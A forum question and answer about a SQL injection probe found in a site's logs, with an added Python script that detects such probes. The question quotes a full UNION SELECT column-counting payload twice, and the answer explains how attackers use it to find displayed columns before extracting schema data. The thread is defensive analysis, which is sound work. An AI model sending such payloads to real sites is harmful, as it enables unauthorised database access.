What is this injection attack trying to achieve?

1

My site has been repeatedly hit by this query. I'm wondering what the attacker is trying to achieve? The URL is: my.site/content/page.aspx?myID=15641111111111111%20UNION%20SELECT%20cAsT(0x2d78312d512d%20as%20char),/**/cAsT(0x2d78322d512d%20as%20char),/**/cAsT(0x2d78332d512d%20as%20char),/**/cAsT(0x2d78342d512d%20as%20char),/**/cAsT(0x2d78352d512d%20as%20char),/**/cAsT(0x2d78362d512d%20as%20char),/**/cAsT(0x2d78372d512d%20as%20char),/**/cAsT(0x2d78382d512d%20as%20char),/**/cAsT(0x2d78392d512d%20as%20char),/**/cAsT(0x2d7831302d512d%20as%20char),/**/cAsT(0x2d7831312d512d%20as%20char),/**/cAsT(0x2d7831322d512d%20as%20char),/**/cAsT(0x2d7831332d512d%20as%20char),/**/cAsT(0x2d7831342d512d%20as%20char),/**/cAsT(0x2d7831352d512d%20as%20char),/**/cAsT(0x2d7831362d512d%20as%20char),/**/cAsT(0x2d7831372d512d%20as%20char),/**/cAsT(0x2d7831382d512d%20as%20char),/**/cAsT(0x2d7831392d512d%20as%20char),/**/cAsT(0x2d7832302d512d%20as%20char),/**/cAsT(0x2d7832312d512d%20as%20char),/**/cAsT(0x2d7832322d512d%20as%20char),/**/cAsT(0x2d7832332d512d%20as%20char),/**/cAsT(0x2d7832342d512d%20as%20char),/**/cAsT(0x2d7832352d512d%20as%20char),/**/cAsT(0x2d7832362d512d%20as%20char),/**/cAsT(0x2d7832372d512d%20as%20char),/**/cAsT(0x2d7832382d512d%20as%20char),/**/cAsT(0x2d7832392d512d%20as%20char),/**/cAsT(0x2d7833302d512d%20as%20char),/**/cAsT(0x2d7833312d512d%20as%20char),/**/cAsT(0x2d7833322d512d%20as%20char),/**/cAsT(0x2d7833332d512d%20as%20char),/**/cAsT(0x2d7833342d512d%20as%20char),/**/cAsT(0x2d7833352d512d%20as%20char),/**/cAsT(0x2d7833362d512d%20as%20char),/**/cAsT(0x2d7833372d512d%20as%20char),/**/cAsT(0x2d7833382d512d%20as%20char),/**/cAsT(0x2d7833392d512d%20as%20char),/**/cAsT(0x2d7834302d512d%20as%20char),/**/cAsT(0x2d7834312d512d%20as%20char),/**/cAsT(0x2d7834322d512d%20as%20char),/**/cAsT(0x2d7834332d512d%20as%20char),/**/cAsT(0x2d7834342d512d%20as%20char),/**/cAsT(0x2d7834352d512d%20as%20char),/**/cAsT(0x2d7834362d512d%20as%20char),/**/cAsT(0x2d7834372d512d%20as%20char),/**/cAsT(0x2d7834382d512d%20as%20char)--

The first four digits in myID are a legitimate ID. Everything after them is obviously a SQL injection attempt. Here is what it looks like with the %20s replaced by spaces and some basic formatting:

UNION SELECT cAsT(0x2d78312d512d as char),/**/ cAsT(0x2d78322d512d as char),/**/ cAsT(0x2d78332d512d as char),/**/ cAsT(0x2d78342d512d as char),/**/ cAsT(0x2d78352d512d as char),/**/ cAsT(0x2d78362d512d as char),/**/ cAsT(0x2d78372d512d as char),/**/ cAsT(0x2d78382d512d as char),/**/ cAsT(0x2d78392d512d as char),/**/ cAsT(0x2d7831302d512d as char),/**/ cAsT(0x2d7831312d512d as char),/**/ cAsT(0x2d7831322d512d as char),/**/ cAsT(0x2d7831332d512d as char),/**/ cAsT(0x2d7831342d512d as char),/**/ cAsT(0x2d7831352d512d as char),/**/ cAsT(0x2d7831362d512d as char),/**/ cAsT(0x2d7831372d512d as char),/**/ cAsT(0x2d7831382d512d as char),/**/ cAsT(0x2d7831392d512d as char),/**/ cAsT(0x2d7832302d512d as char),/**/ cAsT(0x2d7832312d512d as char),/**/ cAsT(0x2d7832322d512d as char),/**/ cAsT(0x2d7832332d512d as char),/**/ cAsT(0x2d7832342d512d as char),/**/ cAsT(0x2d7832352d512d as char),/**/ cAsT(0x2d7832362d512d as char),/**/ cAsT(0x2d7832372d512d as char),/**/ cAsT(0x2d7832382d512d as char),/**/ cAsT(0x2d7832392d512d as char),/**/ cAsT(0x2d7833302d512d as char),/**/ cAsT(0x2d7833312d512d as char),/**/ cAsT(0x2d7833322d512d as char),/**/ cAsT(0x2d7833332d512d as char),/**/ cAsT(0x2d7833342d512d as char),/**/ cAsT(0x2d7833352d512d as char),/**/ cAsT(0x2d7833362d512d as char),/**/ cAsT(0x2d7833372d512d as char),/**/ cAsT(0x2d7833382d512d as char),/**/ cAsT(0x2d7833392d512d as char),/**/ cAsT(0x2d7834302d512d as char),/**/ cAsT(0x2d7834312d512d as char),/**/ cAsT(0x2d7834322d512d as char),/**/ cAsT(0x2d7834332d512d as char),/**/ cAsT(0x2d7834342d512d as char),/**/ cAsT(0x2d7834352d512d as char),/**/ cAsT(0x2d7834362d512d as char),/**/ cAsT(0x2d7834372d512d as char),/**/ cAsT(0x2d7834382d512d as char)--

When I run this query in SSMS, it returns this: All the way through -x48-Q-. Since this isn't actually querying any data, I can't think what the attacker hopes to gain. Has anyone ever seen anything like this before?

posted by silvertiger 19.12.2018 - 22:56

1 answer

2

Looks like a simple scan for vulnerabilities.

The SQL UNION operator requires the second query to return the same number of columns as the first, so the attacker iterates, trying larger and larger unions. If you look, you probably have 48 hits counting up one column at a time, not the same 48-column attempt repeated several times.

If one of those attempts results in a page that contains -x#-Q-, then they will come back and try to build an actual attack by inserting functions to extract table and column names etc. at position #.

answered 20.12.2018 - 01:10
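As an added example (not code from the question or the answer), a small Python checker a defender can run over access-log URLs like the one above: it decodes the query string, counts how many UNION columns a request probes, decodes the hex literals to the -x#-Q- markers the answer describes, and checks whether a captured response body leaked any of them. The sample URL is constructed from the one in the question, shortened to three columns.

```python
import re

# Constructed sample: the question's probe, cut down to three UNION columns.
SAMPLE_URL = (
    "my.site/content/page.aspx?myID=15641111111111111%20UNION%20SELECT%20"
    "cAsT(0x2d78312d512d%20as%20char),/**/cAsT(0x2d78322d512d%20as%20char),"
    "/**/cAsT(0x2d78332d512d%20as%20char)--"
)

# UNION ... SELECT, case-insensitive, allowing /**/ comment filler between the keywords.
UNION_RE = re.compile(r"\bunion\b\s*(?:/\*.*?\*/\s*)*\bselect\b", re.I | re.S)
# cAsT(0x... as char) literals; the hex payload is the marker string.
HEX_CAST_RE = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+char\s*\)", re.I)


def analyse(url):
    """Return None if the URL carries no UNION SELECT probe, otherwise the
    parameter it arrived in, the number of columns probed and the decoded markers."""
    query = url.split("?", 1)[1] if "?" in url else ""
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        # Only %20 is encoded in the question's URL; unquote generically anyway.
        value = re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), value)
        if not UNION_RE.search(value):
            continue
        markers = [
            bytes.fromhex(h).decode("latin-1", "replace")
            for h in HEX_CAST_RE.findall(value)
        ]
        return {"param": name, "columns": len(markers), "markers": markers}
    return None


def leaked_markers(response_body, markers):
    """Markers from the probe that show up in the response: these are the column
    positions the scanner learns are rendered, and would target next."""
    return [m for m in markers if m in response_body]


if __name__ == "__main__":
    result = analyse(SAMPLE_URL)
    print(result)  # 3 columns, markers -x1-Q-, -x2-Q-, -x3-Q-
    print(leaked_markers("<td>-x2-Q-</td>", result["markers"]))
```

Feed each request URL from the log through analyse() and alert on any non-None result; run leaked_markers() against the stored response only if the application logs bodies.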
